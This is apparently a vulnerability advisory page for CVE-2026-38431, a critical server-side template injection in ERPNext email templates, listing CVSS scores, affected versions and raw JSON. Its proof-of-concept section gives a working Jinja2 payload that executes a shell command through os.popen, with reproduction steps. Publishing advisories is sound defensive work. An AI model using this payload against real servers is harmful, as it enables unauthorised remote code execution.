Security Vulnerability Report
CVE-2026-38431 CVSS 9.8 CRITICAL

Published: 2026-05-05 17:17:05
Last Modified: 2026-05-08 17:06:43

Description

ERPNext v15.103.1 and before is vulnerable to Server-Side Template Injection (SSTI). An attacker with permission to create or edit email templates can inject template expressions that are executed on the server when the template is rendered.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:frappe:erpnext:*:*:*:*:*:*:*:* - VULNERABLE
ERPNext <= 15.103.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for ERPNext SSTI (CVE-2026-38431)
# The attacker injects a malicious payload into the Email Template body field.
# Standard Jinja2 SSTI payload to execute system commands
payload = "{{ ''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__['sys'].modules['os'].popen('id').read() }}"

# Steps to reproduce:
# 1. Login to ERPNext.
# 2. Navigate to "Email Template" list.
# 3. Create a new template or edit an existing one.
# 4. Paste the payload into the HTML/Text content.
# 5. Save the template.
# 6. Trigger a notification or preview that renders this template.
# 7. The server will execute 'id' and return the output in the rendered content.

References

https://c0wking.hashnode.dev/ssti-in-erpnext-frappe-email-template-engine (Exploit, Third Party Advisory)
Weakness: CWE-94

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-38431", "sourceIdentifier": "[email protected]", "published": "2026-05-05T17:17:04.670", "lastModified": "2026-05-08T17:06:43.360", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ERPNext v15.103.1 and before is vulnerable to Server-Side Template Injection (SSTI). An attacker with permission to create or edit email templates can inject template expressions that are executed on the server when the template is rendered."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frappe:erpnext:*:*:*:*:*:*:*:*", "versionEndIncluding": "15.103.1", "matchCriteriaId": "1300B107-AF39-4DBD-86BA-406B38A0FB1C"}]}]}], "references": [{"url": "https://c0wking.hashnode.dev/ssti-in-erpnext-frappe-email-template-engine", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://c0wking.hashnode.dev/ssti-in-erpnext-frappe-email-template-engine", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}